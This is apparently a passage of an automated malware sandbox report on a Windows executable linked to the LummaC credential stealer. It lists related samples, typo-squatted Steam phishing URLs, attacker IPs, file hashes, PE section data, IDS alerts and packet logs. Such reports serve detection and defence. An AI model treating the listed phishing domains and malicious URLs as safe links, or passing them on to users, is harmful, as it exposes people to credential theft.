                                                                                                                                                                                                                                      guntac.betfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                                      nvtoaldlrg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                                      steamcommunity.comfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      nvtoaldlrg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      script5.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 23.197.127.21
                                                                                                                                                                                                                                      https://stearncommmunity.com/profiles/52829086342741Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 23.197.127.21
                                                                                                                                                                                                                                      https://sceanmcommnunmnlty.com/xroea/spwoe/zxiweGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      https://sceanmcommnunmnlty.com/sotep/aofpe/zoeprGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      http://gift50steam.com/50Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      L0erlgyZ6f.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      SpaceCheatFort.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 23.192.247.89
                                                                                                                                                                                                                                      https://u.to/LZkkIgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 23.197.127.21

                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                                      file.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                                      https://ctrk.klclick3.com/l/01JP5VPSP6JS7E5VAEC1KGWEB7_2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.17.93.1
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.21.64.1
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                                                      file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                      • 104.21.32.1
                                                                                                                                                                                                                                      https://65.255.55.140:10443/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 1.1.1.1
                                                                                                                                                                                                                                      https://sites.google.com/view/sysgfdgsfghgfdvvbffdv-hgfdcfb/homeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 1.1.1.1
                                                                                                                                                                                                                                      https://tedmino.shop:443/Nordonee_-_Karma.mp3Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 172.67.167.231
                                                                                                                                                                                                                                      AKAMAI-ASUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      http://app.plangrid.com/projects/bcb97291-5564-5612-9970-d1b139dcb62d/staple/b1fc2804-67d4-470e-9780-d2d4344b3b93Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 23.192.228.80
                                                                                                                                                                                                                                      Peo Retention Memo Reff No2.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 23.217.172.185
                                                                                                                                                                                                                                      nvtoaldlrg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      7ZSfxMod_x86.exeGet hashmaliciousGamaredon, UltraVNCBrowse
                                                                                                                                                                                                                                      • 2.19.105.127
                                                                                                                                                                                                                                      http://observalgerie.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                                                      • 23.57.19.78
                                                                                                                                                                                                                                      https://scuddlecakevgzg.cfd/d7p96sGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 2.19.105.89
                                                                                                                                                                                                                                      New_Voicemail_Peterborough_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                      • 92.123.12.9
                                                                                                                                                                                                                                      New_Voicemail_ Peterborough_.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                      • 92.123.12.11
                                                                                                                                                                                                                                      https://test.novanotes.de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 104.73.230.208

                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      nvtoaldlrg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      kmtsefjtjha.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      nyojpsdfkawed.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102
                                                                                                                                                                                                                                      nbvtiopwadkkth.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                                                      • 104.73.234.102

                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                      No created / dropped files found

                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):7.906699567471614
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                      File name:file.exe
                                                                                                                                                                                                                                      File size:2'111'488 bytes
                                                                                                                                                                                                                                      MD5:6f5fd4f79167a7e2c0db0a9f925118b4
                                                                                                                                                                                                                                      SHA1:5a9887316db9016897fbb8e7e349ec5e27fb6ba8
                                                                                                                                                                                                                                      SHA256:ceb426731770a6cc7dcf8eb3a1c0f861e3e5e94562f7c0c37003219485e47509
                                                                                                                                                                                                                                      SHA512:21facc6cf914f1ca5d1a7ce8f7ceac914409e4f6a8dd7b32e3d74a0f0167c7b16d44b0c82c51c9b1bf65cfa1b6fb9ee54460ce5cf25f40fc9c95c8b459a19b93
                                                                                                                                                                                                                                      SSDEEP:49152:TmTINWxavCEC3+CEgCWK/ipp1l7sda2hq+9oYA:TwIAxavHC3+ClPGEDf219oY
                                                                                                                                                                                                                                      TLSH:A1A52206F12C400CE07554B6AB8B41826DFBB6FBD3423ED0DAA9476AE8C7FC95447C69
                                                                                                                                                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g..............................J...........@...........................J......b ...@.................................W...k..

                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Entrypoint:0x8ac000
                                                                                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x67C9DDEB [Thu Mar 6 17:39:55 2025 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      jmp 00007F2E7CB3FF8Ah
                                                                                                                                                                                                                                      movhps xmm4, qword ptr [eax]
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add cl, ch
                                                                                                                                                                                                                                      add byte ptr [eax], ah
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [esi], cl
                                                                                                                                                                                                                                      add eax, dword ptr [eax]
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [ecx], al
                                                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add dword ptr [eax+00000000h], 00000000h
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [08000004h], bh
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [ecx], al
                                                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      jnle 00007F2E7CB3FF02h
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al

                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x610570x6b.idata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x2b0.rsrc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x611f80x8.idata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                      0x10000x5f0000x5f0007bf8a74bb0728007a0ad1c3d0136a1e0False0.5962016858552631data7.1961402952181865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .rsrc0x600000x2b00x20089beb1790d30bb265321a36fbd85a87eFalse0.794921875data6.056544265976366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .idata 0x610000x10000x200f47b289bcee0e13a937cc29db13607bfFalse0.150390625data1.0437720338377494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      0x620000x2a80000x200785407fd88ab9c7d374fa937134eb7fdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      udvczyhg0x30a0000x1a10000x1a0a0063963bd63af726274823b743676800b4False0.9945707461371137data7.954347737644204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      wrnawoey0x4ab0000x10000x60076f5a1bd81ab45f02c8c4ac58e916d88False0.583984375data5.006195236146998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .taggant0x4ac0000x30000x2200ea5f7f57f1933d7510eb64428542851dFalse0.07146139705882353DOS executable (COM)0.793932516431419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                      RT_MANIFEST0x4aa7900x256ASCII text, with CRLF line terminators0.5100334448160535

                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                      kernel32.dlllstrcpy

                                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                      2025-03-13T16:40:03.885406+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849700104.73.234.102443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:03.885406+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849697104.73.234.102443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:03.885406+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849703104.73.234.102443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:03.885406+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706104.73.234.102443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:12.999379+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849682104.73.234.102443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:15.930609+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849683188.114.97.3443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:19.449635+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849684104.73.234.102443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:22.189166+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849685188.114.97.3443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:25.133637+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849686104.73.234.102443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:28.100390+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849688104.73.234.102443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:31.495330+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849693104.73.234.102443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:34.325343+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849694104.73.234.102443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:37.749650+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849695104.73.234.102443TCP
                                                                                                                                                                                                                                      2025-03-13T16:40:40.555151+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849696104.73.234.102443TCP

                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.273219109 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.273269892 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.273370981 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.380201101 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:11.380227089 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:12.999216080 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:12.999378920 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:13.005683899 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:13.005705118 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:13.006118059 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:13.045880079 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:13.104558945 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:13.152323008 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.045811892 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.045846939 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.045882940 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.045890093 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.045912027 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.045913935 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.045942068 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.045967102 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.046008110 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.188019991 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.188047886 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.188133955 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.188163042 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.188211918 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.188236952 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.207176924 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.207230091 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.207307100 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.207350969 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.207350969 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.207350969 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.292356968 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.292356968 CET49682443192.168.2.8104.73.234.102
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.292426109 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.292449951 CET44349682104.73.234.102192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.358951092 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.359004974 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.359066963 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.359558105 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:14.359570026 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.930449963 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.930608988 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.933654070 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.933666945 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.933942080 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.935172081 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.935172081 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:15.935244083 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.889833927 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927072048 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927139997 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927171946 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927206039 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927227974 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927237034 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927246094 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927265882 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.927289009 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.933593035 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.933665991 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.933684111 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.940356970 CET44349683188.114.97.3192.168.2.8
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.940457106 CET49683443192.168.2.8188.114.97.3
                                                                                                                                                                                                                                      Mar 13, 2025 16:40:16.940483093 CET44349683188.114.97.3192.168.2.8
